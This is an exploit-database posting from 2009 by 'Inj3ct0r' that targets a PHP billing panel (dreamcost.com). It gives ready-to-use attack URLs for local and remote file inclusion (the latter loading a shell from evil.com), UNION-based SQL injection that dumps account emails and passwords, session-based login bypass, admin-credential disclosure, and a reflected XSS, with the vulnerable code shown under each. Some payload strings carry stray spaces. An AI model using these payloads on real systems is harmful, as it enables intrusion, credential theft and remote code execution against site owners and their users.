dreamhost-sqlxsslfirfi.txt

Posted on 28 August 2009
=================================================
DreamHost <= && > 2.3 global inj3ct0r.com Exploit
=================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_<_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ >> Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

Decided to make a review to DreamHost - Billing Panel
Site product: dreamcost.com
Version: <= && > 2.3

----------------------------------------------------------------

Local Include Exploit:

/members.php?page=/../../../../../../../../../../etc/passwd%00


Vulnerable code:

// member_template.html
<?
include("member_$page.html");
?>

-----------------------------------------------------------------

Remote Include Exploit:

/admin/?page=http://evil.com/shell.php?

Vulnerable code:

// /admin/template.html
include("$page$page_ext");

------------------------------------------------------------------

Sql Inj3ct0r Exploit:


members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=you session_id

and

members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=-1'+OR+login_logged=0x59%20--%20

Vulnerable code:

// member_orders_view.html
$db = new ps_DB;
$q  = "SELECT * FROM orders WHERE order_id='$order_id' AND order_account_id='$account_id' ORDER BY order_id";

-------------------------------------------------------------

Admin Login: members.php?Page=static&content=login
Admin Password: members.php?Page=static&content=password
Path: members.php?Page=static&content=path

Vulnerable code:

// member_static.thml
<?  echo setup($content);?>

// functions.php
function setup($field) {
$db = new ps_DB;
$q = "SELECT setup_$field FROM setup WHERE setup_id='1'";
$db->query($q);
$db->next_record();

$ret = $db->f("setup_$field");
return $ret;
}
$db->query($q);

-------------------------------------------------------------

SQL-Inj3ct0r entry under randomly Account

members.php?page=account&session_id=-1'+OR+login_logged=0x59%20-%20

Vulnerable code:


// member_account.html
$pass = is_logged($session_id);

// functions.php
function is_logged($session_id) {
$db = new ps_DB;
$q = "SELECT * FROM login WHERE login_id = '$session_id'";
$db->query($q);
$db->next_record();
$ret = $db->f("login_logged");
return $ret;
}

--------------------------------------------------------------

Xss Exploit:

/members.php?page=static&content=<script>alert('inj3ct0r.com')</script>


---------------------------------

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~  - [ [ : Inj3ct0r : ] ]
TOP
Malware :

None in database
Last 20
Exploits :

Last 20